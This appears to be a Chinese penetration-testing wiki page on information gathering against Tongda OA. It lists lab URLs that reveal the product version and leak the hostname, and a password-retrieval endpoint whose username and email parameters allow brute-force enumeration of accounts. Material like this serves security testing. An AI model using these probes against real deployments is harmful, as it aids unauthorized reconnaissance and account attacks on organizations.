fofamini-wiki

登录白背景

源码

通达OA-信息收集

1.判断通达版本

http://192.168.31.62/inc/expired.php

http://192.168.31.90/inc/reg_trial.php

http://192.168.31.90/inc/reg_trial_submit.php

http://192.168.31.62/ispirit/retrieve_pwd.php?username=admin
get请求，参数username、email可爆破用户名、邮箱

http://192.168.31.62/resque/worker.php

原文: https://www.yuque.com/xiaokp7/ocvun2/lgm9av1spt1rx0x4

# 通达OA-信息收集

1.判断通达版本

```java
http://192.168.31.62/inc/expired.php
```

![1679846523095-50598c05-a8d0-401a-9667-6d6e049927f6.png](./img/W-egrSgep5hgNoBQ/1679846523095-50598c05-a8d0-401a-9667-6d6e049927f6-735996.png)

```java
http://192.168.31.90/inc/reg_trial.php
```

![1687082698649-e6ae461a-b6fd-4d45-ab0d-3910dc28b247.png](./img/W-egrSgep5hgNoBQ/1687082698649-e6ae461a-b6fd-4d45-ab0d-3910dc28b247-879201.png)

```java
http://192.168.31.90/inc/reg_trial_submit.php
```

![1687082738371-724ae0b4-ad09-4e8a-a04b-2b80c5d815ba.png](./img/W-egrSgep5hgNoBQ/1687082738371-724ae0b4-ad09-4e8a-a04b-2b80c5d815ba-941580.png)

2. 爆用户名和邮箱

```java
http://192.168.31.62/ispirit/retrieve_pwd.php?username=admin
get请求，参数username、email可爆破用户名、邮箱
```

![1679846874871-926c968e-784c-4c4f-ab86-fbfd505ac60e.png](./img/W-egrSgep5hgNoBQ/1679846874871-926c968e-784c-4c4f-ab86-fbfd505ac60e-030717.png)

![1679846883976-3f39a753-a45c-4d7f-883f-b86235f4f09f.png](./img/W-egrSgep5hgNoBQ/1679846883976-3f39a753-a45c-4d7f-883f-b86235f4f09f-471122.png)

3. 主机名

```java
http://192.168.31.62/resque/worker.php
```

![1679846926413-70c150de-62a8-46a6-b68f-149f1f3840a5.png](./img/W-egrSgep5hgNoBQ/1679846926413-70c150de-62a8-46a6-b68f-149f1f3840a5-779399.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lgm9av1spt1rx0x4>